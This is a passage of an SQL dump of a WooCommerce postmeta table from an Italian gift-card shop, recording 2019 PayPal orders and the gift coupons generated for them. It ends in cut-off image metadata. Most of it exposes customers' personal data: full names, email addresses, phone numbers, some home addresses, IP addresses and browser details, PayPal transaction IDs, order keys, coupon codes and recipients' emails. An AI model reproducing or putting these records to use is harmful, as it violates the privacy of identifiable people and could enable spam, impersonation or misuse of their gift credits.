Safari/604.1'),(17670,822,'_created_via','checkout'),(17671,822,'_date_completed',''),(17672,822,'_completed_date',''),(17673,822,'_date_paid','1556906090'),(17674,822,'_paid_date','2019-05-03 19:54:50'),(17675,822,'_cart_hash','24a052aed4e8f61259ed54458ae42028'),(17676,822,'_billing_first_name','Paola'),(17677,822,'_billing_last_name','Mapelli'),(17678,822,'_billing_company',''),(17679,822,'_billing_address_1',''),(17680,822,'_billing_address_2',''),(17681,822,'_billing_city',''),(17682,822,'_billing_state',''),(17683,822,'_billing_postcode',''),(17684,822,'_billing_country',''),(17685,822,'_billing_email','Pmapelli@live.it'),(17686,822,'_billing_phone','+39 392 0041581'),(17687,822,'_shipping_first_name',''),(17688,822,'_shipping_last_name',''),(17689,822,'_shipping_company',''),(17690,822,'_shipping_address_1',''),(17691,822,'_shipping_address_2',''),(17692,822,'_shipping_city',''),(17693,822,'_shipping_state',''),(17694,822,'_shipping_postcode',''),(17695,822,'_shipping_country',''),(17696,822,'_order_currency','EUR'),(17697,822,'_cart_discount','0'),(17698,822,'_cart_discount_tax','0'),(17699,822,'_order_shipping','0.00'),(17700,822,'_order_shipping_tax','0'),(17701,822,'_order_tax','0'),(17702,822,'_order_total','166.00'),(17703,822,'_order_version','3.5.7'),(17704,822,'_prices_include_tax','no'),(17705,822,'_billing_address_index','Paola Mapelli        Pmapelli@live.it +39 392 0041581'),(17706,822,'_shipping_address_index','        '),(17707,822,'Quanti adulti?','8'),(17708,822,'Numero bambini fino a 6 anni','0'),(17709,822,'Numero ragazzi fino a 14 anni','0'),(17710,822,'Numero ragazzi dai 15 anni in su','0'),(17711,822,'Files attached','[]'),(17712,822,'Payment type','instant'),(17713,822,'_paypal_status','completed'),(17714,822,'_download_permissions_granted','yes'),(17715,822,'_recorded_sales','yes'),(17716,822,'_recorded_coupon_usage_counts','yes'),(17717,822,'_order_stock_reduced','yes'),(17718,823,'discount_type','fixed_cart'),(17719,823,'coupon_amount','166'),(17720,823,'individual_use','no'),(17721,823,'usage_limit','1'),(17722,823,'expiry_date','2019-10-30'),(17723,823,'apply_before_tax','no'),(17724,823,'free_shipping','yes'),(17725,823,'minimum_amount',''),(17726,823,'maximum_amount',''),(17727,823,'exclude_sale_items','no'),(17728,823,'exclude_product_categories',''),(17729,823,'exclude_product_ids',''),(17730,823,'mwb_wgm_giftcard_coupon','822'),(17731,823,'mwb_wgm_giftcard_coupon_unique','online'),(17732,823,'mwb_wgm_giftcard_coupon_product_id','548'),(17733,823,'mwb_wgm_giftcard_coupon_mail_to','Donatella '),(17734,822,'822#312','solymarcouponINIJT'),(17735,822,'mwb_wgm_order_giftcard','send'),(17736,822,'PayPal Transaction Fee','5.99'),(17737,824,'_order_key','wc_order_DLPivPo4wn0qS'),(17738,824,'_customer_user','0'),(17739,824,'_payment_method','paypal'),(17740,824,'_payment_method_title','PayPal'),(17741,824,'_transaction_id','3CK09410V6198650S'),(17742,824,'_customer_ip_address','151.38.210.168'),(17743,824,'_customer_user_agent','Mozilla/5.0 (Linux; Android 6.0; HUAWEI VNS-L31 Build/HUAWEIVNS-L31) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.91 Mobile Safari/537.36'),(17744,824,'_created_via','checkout'),(17745,824,'_date_completed',''),(17746,824,'_completed_date',''),(17747,824,'_date_paid','1558698428'),(17748,824,'_paid_date','2019-05-24 13:47:08'),(17749,824,'_cart_hash','e5b857a26f12cd2a7aacd60c0bcf9b98'),(17750,824,'_billing_first_name','Maria'),(17751,824,'_billing_last_name','Scudellari'),(17752,824,'_billing_company',''),(17753,824,'_billing_address_1','Via Cavour, 3'),(17754,824,'_billing_address_2',''),(17755,824,'_billing_city','Ravenna'),(17756,824,'_billing_state',''),(17757,824,'_billing_postcode',''),(17758,824,'_billing_country',''),(17759,824,'_billing_email','marscudellari@gmail.com'),(17760,824,'_billing_phone','3383106260'),(17761,824,'_shipping_first_name',''),(17762,824,'_shipping_last_name',''),(17763,824,'_shipping_company',''),(17764,824,'_shipping_address_1',''),(17765,824,'_shipping_address_2',''),(17766,824,'_shipping_city',''),(17767,824,'_shipping_state',''),(17768,824,'_shipping_postcode',''),(17769,824,'_shipping_country',''),(17770,824,'_order_currency','EUR'),(17771,824,'_cart_discount','0'),(17772,824,'_cart_discount_tax','0'),(17773,824,'_order_shipping','0.00'),(17774,824,'_order_shipping_tax','0'),(17775,824,'_order_tax','0'),(17776,824,'_order_total','195.00'),(17777,824,'_order_version','3.5.7'),(17778,824,'_prices_include_tax','no'),(17779,824,'_billing_address_index','Maria Scudellari  Via Cavour, 3  Ravenna    marscudellari@gmail.com 3383106260'),(17780,824,'_shipping_address_index','        '),(17781,824,'Quanti adulti?','1'),(17782,824,'Numero bambini fino a 6 anni','0'),(17783,824,'Numero ragazzi fino a 14 anni','0'),(17784,824,'Numero ragazzi dai 15 anni in su','0'),(17785,824,'Files attached','[]'),(17786,824,'Payment type','instant'),(17787,824,'_paypal_status','completed'),(17788,824,'_download_permissions_granted','yes'),(17789,824,'_recorded_sales','yes'),(17790,824,'_recorded_coupon_usage_counts','yes'),(17791,824,'_order_stock_reduced','yes'),(17792,825,'discount_type','fixed_cart'),(17793,825,'coupon_amount','195'),(17794,825,'individual_use','no'),(17795,825,'usage_limit','1'),(17796,825,'expiry_date','2019-11-20'),(17797,825,'apply_before_tax','no'),(17798,825,'free_shipping','yes'),(17799,825,'minimum_amount',''),(17800,825,'maximum_amount',''),(17801,825,'exclude_sale_items','no'),(17802,825,'exclude_product_categories',''),(17803,825,'exclude_product_ids',''),(17804,825,'mwb_wgm_giftcard_coupon','824'),(17805,825,'mwb_wgm_giftcard_coupon_unique','online'),(17806,825,'mwb_wgm_giftcard_coupon_product_id','548'),(17807,825,'mwb_wgm_giftcard_coupon_mail_to','marscudellari@gmail.com'),(17808,824,'824#313','solymarcouponI8RCI'),(17809,824,'mwb_wgm_order_giftcard','send'),(17810,824,'PayPal Transaction Fee','6.98'),(17811,826,'_order_key','wc_order_BRM0X1qMEQYTd'),(17812,826,'_customer_user','0'),(17813,826,'_payment_method','paypal'),(17814,826,'_payment_method_title','PayPal'),(17815,826,'_transaction_id','5L702690U0376884U'),(17816,826,'_customer_ip_address','93.40.210.42'),(17817,826,'_customer_user_agent','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),(17818,826,'_created_via','checkout'),(17819,826,'_date_completed','1558977067'),(17820,826,'_completed_date','2019-05-27 19:11:07'),(17821,826,'_date_paid','1558976921'),(17822,826,'_paid_date','2019-05-27 19:08:41'),(17823,826,'_cart_hash','7fea40806541e9fe80ef1a4e8a037c07'),(17824,826,'_billing_first_name','Andrea'),(17825,826,'_billing_last_name','Riceci'),(17826,826,'_billing_company',''),(17827,826,'_billing_address_1','viale perugia 29, primo piano'),(17828,826,'_billing_address_2',''),(17829,826,'_billing_city','riccione'),(17830,826,'_billing_state',''),(17831,826,'_billing_postcode',''),(17832,826,'_billing_country',''),(17833,826,'_billing_email','barbara8riceci@gmail.com'),(17834,826,'_billing_phone','3483718480'),(17835,826,'_shipping_first_name',''),(17836,826,'_shipping_last_name',''),(17837,826,'_shipping_company',''),(17838,826,'_shipping_address_1',''),(17839,826,'_shipping_address_2',''),(17840,826,'_shipping_city',''),(17841,826,'_shipping_state',''),(17842,826,'_shipping_postcode',''),(17843,826,'_shipping_country',''),(17844,826,'_order_currency','EUR'),(17845,826,'_cart_discount','0'),(17846,826,'_cart_discount_tax','0'),(17847,826,'_order_shipping','0.00'),(17848,826,'_order_shipping_tax','0'),(17849,826,'_order_tax','0'),(17850,826,'_order_total','100.00'),(17851,826,'_order_version','3.5.7'),(17852,826,'_prices_include_tax','no'),(17853,826,'_billing_address_index','Andrea Riceci  viale perugia 29, primo piano  riccione    barbara8riceci@gmail.com 3483718480'),(17854,826,'_shipping_address_index','        '),(17855,826,'Quanti adulti?',''),(17856,826,'Numero bambini fino a 6 anni','0'),(17857,826,'Numero ragazzi fino a 14 anni','0'),(17858,826,'Numero ragazzi dai 15 anni in su','0'),(17859,826,'Files attached','[]'),(17860,826,'Payment type','instant'),(17861,826,'_paypal_status','completed'),(17862,826,'_download_permissions_granted','yes'),(17863,826,'_recorded_sales','yes'),(17864,826,'_recorded_coupon_usage_counts','yes'),(17865,826,'_order_stock_reduced','yes'),(17866,827,'discount_type','fixed_cart'),(17867,827,'coupon_amount','100'),(17868,827,'individual_use','no'),(17869,827,'usage_limit','1'),(17870,827,'expiry_date','2019-11-23'),(17871,827,'apply_before_tax','no'),(17872,827,'free_shipping','yes'),(17873,827,'minimum_amount',''),(17874,827,'maximum_amount',''),(17875,827,'exclude_sale_items','no'),(17876,827,'exclude_product_categories',''),(17877,827,'exclude_product_ids',''),(17878,827,'mwb_wgm_giftcard_coupon','826'),(17879,827,'mwb_wgm_giftcard_coupon_unique','online'),(17880,827,'mwb_wgm_giftcard_coupon_product_id','548'),(17881,827,'mwb_wgm_giftcard_coupon_mail_to','barbara8riceci@gmail.com'),(17882,826,'826#314','solymarcoupon0F9UO'),(17883,826,'mwb_wgm_order_giftcard','send'),(17884,826,'PayPal Transaction Fee','3.75'),(17885,828,'_order_key','wc_order_WQzeFbOR9IroQ'),(17886,828,'_customer_user','56'),(17887,828,'_payment_method','paypal'),(17888,828,'_payment_method_title','PayPal'),(17889,828,'_transaction_id','6L3855438X245710F'),(17890,828,'_customer_ip_address','188.218.87.200'),(17891,828,'_customer_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36'),(17892,828,'_created_via','checkout'),(17893,828,'_date_completed','1559745025'),(17894,828,'_completed_date','2019-06-05 16:30:25'),(17895,828,'_date_paid','1559744920'),(17896,828,'_paid_date','2019-06-05 16:28:40'),(17897,828,'_cart_hash','dbe592b04ffa96177cf7223d2d78add6'),(17898,828,'_billing_first_name','rebecca'),(17899,828,'_billing_last_name','pedrazzi'),(17900,828,'_billing_company',''),(17901,828,'_billing_address_1',''),(17902,828,'_billing_address_2',''),(17903,828,'_billing_city','modena'),(17904,828,'_billing_state',''),(17905,828,'_billing_postcode',''),(17906,828,'_billing_country',''),(17907,828,'_billing_email','rebeccapedrazzi97@gmail.com'),(17908,828,'_billing_phone','3489885788'),(17909,828,'_shipping_first_name',''),(17910,828,'_shipping_last_name',''),(17911,828,'_shipping_company',''),(17912,828,'_shipping_address_1',''),(17913,828,'_shipping_address_2',''),(17914,828,'_shipping_city',''),(17915,828,'_shipping_state',''),(17916,828,'_shipping_postcode',''),(17917,828,'_shipping_country',''),(17918,828,'_order_currency','EUR'),(17919,828,'_cart_discount','0'),(17920,828,'_cart_discount_tax','0'),(17921,828,'_order_shipping','0.00'),(17922,828,'_order_shipping_tax','0'),(17923,828,'_order_tax','0'),(17924,828,'_order_total','115.00'),(17925,828,'_order_version','3.5.7'),(17926,828,'_prices_include_tax','no'),(17927,828,'_billing_address_index','rebecca pedrazzi    modena    rebeccapedrazzi97@gmail.com 3489885788'),(17928,828,'_shipping_address_index','        '),(17929,828,'Quanti adulti?','2'),(17930,828,'Numero bambini fino a 6 anni','0'),(17931,828,'Numero ragazzi fino a 14 anni','0'),(17932,828,'Numero ragazzi dai 15 anni in su','0'),(17933,828,'Files attached','[]'),(17934,828,'Payment type','instant'),(17935,828,'_paypal_status','completed'),(17936,828,'_download_permissions_granted','yes'),(17937,828,'_recorded_sales','yes'),(17938,828,'_recorded_coupon_usage_counts','yes'),(17939,828,'_order_stock_reduced','yes'),(17940,829,'discount_type','fixed_cart'),(17941,829,'coupon_amount','115'),(17942,829,'individual_use','no'),(17943,829,'usage_limit','1'),(17944,829,'expiry_date','2019-12-02'),(17945,829,'apply_before_tax','no'),(17946,829,'free_shipping','yes'),(17947,829,'minimum_amount',''),(17948,829,'maximum_amount',''),(17949,829,'exclude_sale_items','no'),(17950,829,'exclude_product_categories',''),(17951,829,'exclude_product_ids',''),(17952,829,'mwb_wgm_giftcard_coupon','828'),(17953,829,'mwb_wgm_giftcard_coupon_unique','online'),(17954,829,'mwb_wgm_giftcard_coupon_product_id','475'),(17955,829,'mwb_wgm_giftcard_coupon_mail_to','kristicenolli@gmail.com'),(17956,828,'828#315','solymarcouponO610C'),(17957,828,'mwb_wgm_order_giftcard','send'),(17958,828,'PayPal Transaction Fee','4.26'),(17959,830,'_order_key','wc_order_KdH7QW1KizEj1'),(17960,830,'_customer_user','0'),(17961,830,'_payment_method','paypal'),(17962,830,'_payment_method_title','PayPal'),(17963,830,'_transaction_id','550981408X581363D'),(17964,830,'_customer_ip_address','151.20.0.16'),(17965,830,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),(17966,830,'_created_via','checkout'),(17967,830,'_date_completed',''),(17968,830,'_completed_date',''),(17969,830,'_date_paid','1559763603'),(17970,830,'_paid_date','2019-06-05 21:40:03'),(17971,830,'_cart_hash','c9a58b3f6a9dbfd343155cab1fbe4d7c'),(17972,830,'_billing_first_name','michele'),(17973,830,'_billing_last_name','moffa'),(17974,830,'_billing_company',''),(17975,830,'_billing_address_1',''),(17976,830,'_billing_address_2',''),(17977,830,'_billing_city',''),(17978,830,'_billing_state',''),(17979,830,'_billing_postcode',''),(17980,830,'_billing_country',''),(17981,830,'_billing_email','michele.moffa@yahoo.it'),(17982,830,'_billing_phone','3498479094'),(17983,830,'_shipping_first_name',''),(17984,830,'_shipping_last_name',''),(17985,830,'_shipping_company',''),(17986,830,'_shipping_address_1',''),(17987,830,'_shipping_address_2',''),(17988,830,'_shipping_city',''),(17989,830,'_shipping_state',''),(17990,830,'_shipping_postcode',''),(17991,830,'_shipping_country',''),(17992,830,'_order_currency','EUR'),(17993,830,'_cart_discount','0'),(17994,830,'_cart_discount_tax','0'),(17995,830,'_order_shipping','0.00'),(17996,830,'_order_shipping_tax','0'),(17997,830,'_order_tax','0'),(17998,830,'_order_total','135.00'),(17999,830,'_order_version','3.5.7'),(18000,830,'_prices_include_tax','no'),(18001,830,'_billing_address_index','michele moffa        michele.moffa@yahoo.it 3498479094'),(18002,830,'_shipping_address_index','        '),(18003,830,'Quanti adulti?','1'),(18004,830,'Numero bambini fino a 6 anni','0'),(18005,830,'Numero ragazzi fino a 14 anni','0'),(18006,830,'Numero ragazzi dai 15 anni in su','0'),(18007,830,'Files attached','[]'),(18008,830,'Payment type','instant'),(18009,830,'_paypal_status','completed'),(18010,830,'_download_permissions_granted','yes'),(18011,830,'_recorded_sales','yes'),(18012,830,'_recorded_coupon_usage_counts','yes'),(18013,830,'_order_stock_reduced','yes'),(18014,831,'discount_type','fixed_cart'),(18015,831,'coupon_amount','135'),(18016,831,'individual_use','no'),(18017,831,'usage_limit','1'),(18018,831,'expiry_date','2019-12-02'),(18019,831,'apply_before_tax','no'),(18020,831,'free_shipping','yes'),(18021,831,'minimum_amount',''),(18022,831,'maximum_amount',''),(18023,831,'exclude_sale_items','no'),(18024,831,'exclude_product_categories',''),(18025,831,'exclude_product_ids',''),(18026,831,'mwb_wgm_giftcard_coupon','830'),(18027,831,'mwb_wgm_giftcard_coupon_unique','online'),(18028,831,'mwb_wgm_giftcard_coupon_product_id','548'),(18029,831,'mwb_wgm_giftcard_coupon_mail_to','michele.moffa@yahoo.it'),(18030,830,'830#316','solymarcouponLJBM5'),(18031,830,'mwb_wgm_order_giftcard','send'),(18032,830,'PayPal Transaction Fee','4.94'),(18033,832,'_order_key','wc_order_oisdrwAXBjCqu'),(18034,832,'_customer_user','0'),(18035,832,'_payment_method','paypal'),(18036,832,'_payment_method_title','PayPal'),(18037,832,'_transaction_id','8A189123E2688623R'),(18038,832,'_customer_ip_address','37.119.62.47'),(18039,832,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0'),(18040,832,'_created_via','checkout'),(18041,832,'_date_completed',''),(18042,832,'_completed_date',''),(18043,832,'_date_paid','1559923598'),(18044,832,'_paid_date','2019-06-07 18:06:38'),(18045,832,'_cart_hash','9239c90660b217215b45957346a9e14b'),(18046,832,'_billing_first_name','Roberto'),(18047,832,'_billing_last_name','Malavasi'),(18048,832,'_billing_company',''),(18049,832,'_billing_address_1','via erri billò 36'),(18050,832,'_billing_address_2',''),(18051,832,'_billing_city','41043 Formigine (Mo)'),(18052,832,'_billing_state',''),(18053,832,'_billing_postcode',''),(18054,832,'_billing_country',''),(18055,832,'_billing_email','robbimalavasi@gmail.com'),(18056,832,'_billing_phone','340 - 0648580'),(18057,832,'_shipping_first_name',''),(18058,832,'_shipping_last_name',''),(18059,832,'_shipping_company',''),(18060,832,'_shipping_address_1',''),(18061,832,'_shipping_address_2',''),(18062,832,'_shipping_city',''),(18063,832,'_shipping_state',''),(18064,832,'_shipping_postcode',''),(18065,832,'_shipping_country',''),(18066,832,'_order_currency','EUR'),(18067,832,'_cart_discount','0'),(18068,832,'_cart_discount_tax','0'),(18069,832,'_order_shipping','0.00'),(18070,832,'_order_shipping_tax','0'),(18071,832,'_order_tax','0'),(18072,832,'_order_total','165.00'),(18073,832,'_order_version','3.5.7'),(18074,832,'_prices_include_tax','no'),(18075,832,'_billing_address_index','Roberto Malavasi  via erri billò 36  41043 Formigine (Mo)    robbimalavasi@gmail.com 340 - 0648580'),(18076,832,'_shipping_address_index','        '),(18077,832,'Quanti adulti?',''),(18078,832,'Numero bambini fino a 6 anni','0'),(18079,832,'Numero ragazzi fino a 14 anni','0'),(18080,832,'Numero ragazzi dai 15 anni in su','0'),(18081,832,'Files attached','[]'),(18082,832,'Payment type','instant'),(18083,832,'_paypal_status','completed'),(18084,832,'_download_permissions_granted','yes'),(18085,832,'_recorded_sales','yes'),(18086,832,'_recorded_coupon_usage_counts','yes'),(18087,832,'_order_stock_reduced','yes'),(18088,833,'discount_type','fixed_cart'),(18089,833,'coupon_amount','165'),(18090,833,'individual_use','no'),(18091,833,'usage_limit','1'),(18092,833,'expiry_date','2019-12-04'),(18093,833,'apply_before_tax','no'),(18094,833,'free_shipping','yes'),(18095,833,'minimum_amount',''),(18096,833,'maximum_amount',''),(18097,833,'exclude_sale_items','no'),(18098,833,'exclude_product_categories',''),(18099,833,'exclude_product_ids',''),(18100,833,'mwb_wgm_giftcard_coupon','832'),(18101,833,'mwb_wgm_giftcard_coupon_unique','online'),(18102,833,'mwb_wgm_giftcard_coupon_product_id','548'),(18103,833,'mwb_wgm_giftcard_coupon_mail_to','robbimalavasi@gmail.com'),(18104,832,'832#317','solymarcouponI37MW'),(18105,832,'mwb_wgm_order_giftcard','send'),(18106,832,'PayPal Transaction Fee','5.96'),(18107,834,'_order_key','wc_order_3x2lVcXP1vaAo'),(18108,834,'_customer_user','0'),(18109,834,'_payment_method','paypal'),(18110,834,'_payment_method_title','PayPal'),(18111,834,'_transaction_id','3LD90656HH6045422'),(18112,834,'_customer_ip_address','93.40.213.120'),(18113,834,'_customer_user_agent','Mozilla/5.0 (iPad; CPU OS 12_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1'),(18114,834,'_created_via','checkout'),(18115,834,'_date_completed','1560616299'),(18116,834,'_completed_date','2019-06-15 18:31:39'),(18117,834,'_date_paid','1560616291'),(18118,834,'_paid_date','2019-06-15 18:31:31'),(18119,834,'_cart_hash','b4d7094c87627be7d252a1a79384e11e'),(18120,834,'_billing_first_name','Chiara'),(18121,834,'_billing_last_name','Cenci'),(18122,834,'_billing_company',''),(18123,834,'_billing_address_1',''),(18124,834,'_billing_address_2',''),(18125,834,'_billing_city',''),(18126,834,'_billing_state',''),(18127,834,'_billing_postcode',''),(18128,834,'_billing_country',''),(18129,834,'_billing_email','Cchiara@gmail.com'),(18130,834,'_billing_phone','3336313560'),(18131,834,'_shipping_first_name',''),(18132,834,'_shipping_last_name',''),(18133,834,'_shipping_company',''),(18134,834,'_shipping_address_1',''),(18135,834,'_shipping_address_2',''),(18136,834,'_shipping_city',''),(18137,834,'_shipping_state',''),(18138,834,'_shipping_postcode',''),(18139,834,'_shipping_country',''),(18140,834,'_order_currency','EUR'),(18141,834,'_cart_discount','0'),(18142,834,'_cart_discount_tax','0'),(18143,834,'_order_shipping','0.00'),(18144,834,'_order_shipping_tax','0'),(18145,834,'_order_tax','0'),(18146,834,'_order_total','115.00'),(18147,834,'_order_version','3.5.7'),(18148,834,'_prices_include_tax','no'),(18149,834,'_billing_address_index','Chiara Cenci        Cchiara@gmail.com 3336313560'),(18150,834,'_shipping_address_index','        '),(18151,834,'Quanti adulti?','1'),(18152,834,'Numero bambini fino a 6 anni','0'),(18153,834,'Numero ragazzi fino a 14 anni','0'),(18154,834,'Numero ragazzi dai 15 anni in su','0'),(18155,834,'Files attached','[]'),(18156,834,'Payment type','instant'),(18157,834,'_paypal_status','completed'),(18158,834,'_download_permissions_granted','yes'),(18159,834,'_recorded_sales','yes'),(18160,834,'_recorded_coupon_usage_counts','yes'),(18161,834,'_order_stock_reduced','yes'),(18162,835,'discount_type','fixed_cart'),(18163,835,'coupon_amount','115'),(18164,835,'individual_use','no'),(18165,835,'usage_limit','1'),(18166,835,'expiry_date','2019-12-12'),(18167,835,'apply_before_tax','no'),(18168,835,'free_shipping','yes'),(18169,835,'minimum_amount',''),(18170,835,'maximum_amount',''),(18171,835,'exclude_sale_items','no'),(18172,835,'exclude_product_categories',''),(18173,835,'exclude_product_ids',''),(18174,835,'mwb_wgm_giftcard_coupon','834'),(18175,835,'mwb_wgm_giftcard_coupon_unique','online'),(18176,835,'mwb_wgm_giftcard_coupon_product_id','475'),(18177,835,'mwb_wgm_giftcard_coupon_mail_to','Raffaella e Piergiorgio'),(18178,834,'834#318','solymarcoupon3VWU7'),(18179,834,'mwb_wgm_order_giftcard','send'),(18180,834,'PayPal Transaction Fee','4.26'),(18181,836,'_order_key','wc_order_QC1LHxHXXWkXt'),(18182,836,'_customer_user','0'),(18183,836,'_payment_method','paypal'),(18184,836,'_payment_method_title','PayPal'),(18185,836,'_transaction_id','30027379JA407954E'),(18186,836,'_customer_ip_address','79.50.48.152'),(18187,836,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:67.0) Gecko/20100101 Firefox/67.0'),(18188,836,'_created_via','checkout'),(18189,836,'_date_completed',''),(18190,836,'_completed_date',''),(18191,836,'_date_paid','1560682249'),(18192,836,'_paid_date','2019-06-16 12:50:49'),(18193,836,'_cart_hash','5ad1c707436f74a5caab8a1b94ef57f7'),(18194,836,'_billing_first_name','francesca'),(18195,836,'_billing_last_name','fontanesi'),(18196,836,'_billing_company',''),(18197,836,'_billing_address_1',''),(18198,836,'_billing_address_2',''),(18199,836,'_billing_city',''),(18200,836,'_billing_state',''),(18201,836,'_billing_postcode',''),(18202,836,'_billing_country',''),(18203,836,'_billing_email','francesca.fontanesi@gmail.com'),(18204,836,'_billing_phone','3494515820'),(18205,836,'_shipping_first_name',''),(18206,836,'_shipping_last_name',''),(18207,836,'_shipping_company',''),(18208,836,'_shipping_address_1',''),(18209,836,'_shipping_address_2',''),(18210,836,'_shipping_city',''),(18211,836,'_shipping_state',''),(18212,836,'_shipping_postcode',''),(18213,836,'_shipping_country',''),(18214,836,'_order_currency','EUR'),(18215,836,'_cart_discount','0'),(18216,836,'_cart_discount_tax','0'),(18217,836,'_order_shipping','0.00'),(18218,836,'_order_shipping_tax','0'),(18219,836,'_order_tax','0'),(18220,836,'_order_total','120.00'),(18221,836,'_order_version','3.5.7'),(18222,836,'_prices_include_tax','no'),(18223,836,'_billing_address_index','francesca fontanesi        francesca.fontanesi@gmail.com 3494515820'),(18224,836,'_shipping_address_index','        '),(18225,836,'Quanti adulti?','8'),(18226,836,'Numero bambini fino a 6 anni','0'),(18227,836,'Numero ragazzi fino a 14 anni','0'),(18228,836,'Numero ragazzi dai 15 anni in su','0'),(18229,836,'Files attached','[]'),(18230,836,'Payment type','instant'),(18231,836,'_paypal_status','completed'),(18232,836,'_download_permissions_granted','yes'),(18233,836,'_recorded_sales','yes'),(18234,836,'_recorded_coupon_usage_counts','yes'),(18235,836,'_order_stock_reduced','yes'),(18236,837,'discount_type','fixed_cart'),(18237,837,'coupon_amount','120'),(18238,837,'individual_use','no'),(18239,837,'usage_limit','1'),(18240,837,'expiry_date','2019-12-13'),(18241,837,'apply_before_tax','no'),(18242,837,'free_shipping','yes'),(18243,837,'minimum_amount',''),(18244,837,'maximum_amount',''),(18245,837,'exclude_sale_items','no'),(18246,837,'exclude_product_categories',''),(18247,837,'exclude_product_ids',''),(18248,837,'mwb_wgm_giftcard_coupon','836'),(18249,837,'mwb_wgm_giftcard_coupon_unique','online'),(18250,837,'mwb_wgm_giftcard_coupon_product_id','548'),(18251,837,'mwb_wgm_giftcard_coupon_mail_to','francesca.fontanesi@gmail.com'),(18252,836,'836#320','solymarcouponY5DCR'),(18253,836,'mwb_wgm_order_giftcard','send'),(18254,836,'PayPal Transaction Fee','4.43'),(18255,838,'_order_key','wc_order_vtMwWoKjSl3gG'),(18256,838,'_customer_user','0'),(18257,838,'_payment_method','paypal'),(18258,838,'_payment_method_title','PayPal'),(18259,838,'_transaction_id','63D51750M6272501A'),(18260,838,'_customer_ip_address','93.147.146.53'),(18261,838,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),(18262,838,'_created_via','checkout'),(18263,838,'_date_completed',''),(18264,838,'_completed_date',''),(18265,838,'_date_paid','1560848338'),(18266,838,'_paid_date','2019-06-18 10:58:58'),(18267,838,'_cart_hash','502724850d0bbcaba16e65cc84084afd'),(18268,838,'_billing_first_name','Eveline'),(18269,838,'_billing_last_name','Tommassoni'),(18270,838,'_billing_company',''),(18271,838,'_billing_address_1','via cairoli 2/d c/o parrucchiera Hair Studio 96'),(18272,838,'_billing_address_2',''),(18273,838,'_billing_city','Riccione'),(18274,838,'_billing_state',''),(18275,838,'_billing_postcode',''),(18276,838,'_billing_country',''),(18277,838,'_billing_email','evelinetomassoni@icloud.com'),(18278,838,'_billing_phone','3494668927'),(18279,838,'_shipping_first_name',''),(18280,838,'_shipping_last_name',''),(18281,838,'_shipping_company',''),(18282,838,'_shipping_address_1',''),(18283,838,'_shipping_address_2',''),(18284,838,'_shipping_city',''),(18285,838,'_shipping_state',''),(18286,838,'_shipping_postcode',''),(18287,838,'_shipping_country',''),(18288,838,'_order_currency','EUR'),(18289,838,'_cart_discount','0'),(18290,838,'_cart_discount_tax','0'),(18291,838,'_order_shipping','0.00'),(18292,838,'_order_shipping_tax','0'),(18293,838,'_order_tax','0'),(18294,838,'_order_total','115.00'),(18295,838,'_order_version','3.5.7'),(18296,838,'_prices_include_tax','no'),(18297,838,'_billing_address_index','Eveline Tommassoni  via cairoli 2/d c/o parrucchiera Hair Studio 96  Riccione    evelinetomassoni@icloud.com 3494668927'),(18298,838,'_shipping_address_index','        '),(18299,838,'Quanti adulti?','2'),(18300,838,'Numero bambini fino a 6 anni','0'),(18301,838,'Numero ragazzi fino a 14 anni','0'),(18302,838,'Numero ragazzi dai 15 anni in su','0'),(18303,838,'Files attached','[]'),(18304,838,'Payment type','instant'),(18305,838,'_paypal_status','completed'),(18306,838,'_download_permissions_granted','yes'),(18307,838,'_recorded_sales','yes'),(18308,838,'_recorded_coupon_usage_counts','yes'),(18309,838,'_order_stock_reduced','yes'),(18310,839,'discount_type','fixed_cart'),(18311,839,'coupon_amount','115'),(18312,839,'individual_use','no'),(18313,839,'usage_limit','1'),(18314,839,'expiry_date','2019-12-15'),(18315,839,'apply_before_tax','no'),(18316,839,'free_shipping','yes'),(18317,839,'minimum_amount',''),(18318,839,'maximum_amount',''),(18319,839,'exclude_sale_items','no'),(18320,839,'exclude_product_categories',''),(18321,839,'exclude_product_ids',''),(18322,839,'mwb_wgm_giftcard_coupon','838'),(18323,839,'mwb_wgm_giftcard_coupon_unique','online'),(18324,839,'mwb_wgm_giftcard_coupon_product_id','475'),(18325,839,'mwb_wgm_giftcard_coupon_mail_to','gabriellabava18@gmail.com'),(18326,838,'838#321','solymarcoupon37YXF'),(18327,838,'mwb_wgm_order_giftcard','send'),(18328,838,'PayPal Transaction Fee','4.26'),(52024,2978,'_wp_attachment_image_alt','d'),(52025,2985,'_wp_attached_file','2018/09/landing-box-img-1.jpg'),(52026,2985,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:592;s:6:\"height\";i:475;s:4:\"file\";s:29:\"2018/09/landing-box-img-1.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"landing-box-img-1-300x241.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:241;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"landing-box-img-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"landing-box-img-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"landing-box-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:29:\"landing-box-img-1-300x375.jpg\";s:5:\"